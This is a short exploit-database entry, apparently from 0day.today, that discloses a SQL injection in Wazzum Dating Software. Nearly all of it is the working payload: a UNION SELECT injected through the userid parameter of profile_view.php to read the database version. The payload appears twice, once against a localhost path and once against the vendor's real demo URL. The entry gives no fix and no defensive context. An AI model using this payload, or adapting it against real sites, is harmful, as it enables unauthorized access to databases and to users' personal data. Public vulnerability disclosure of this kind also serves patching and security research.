id: 4734
date: 01/26/2009
title: Wazzum Dating Software (userid) SQL Injection Vulnerability
author: nuclear
cves: 

===========================================================
Wazzum Dating Software (userid) SQL Injection Vulnerability
===========================================================



#Wazzum Dating Software (userid) SQL Injection Vulnerability


#Author: nuclear


#site:
http://www.wazzum.com/


#vuln:
http://localhost/[path]/profile_view.php?userid=-1 union select 1,2,3,4,5,@@version /*


#demo:
http://www.wazzum.com/dating_demo/profile_view.php?userid=-1%20union%20select%201,2,3,4,5,@@version%20/*



#  0day.today [2023-03-25]  #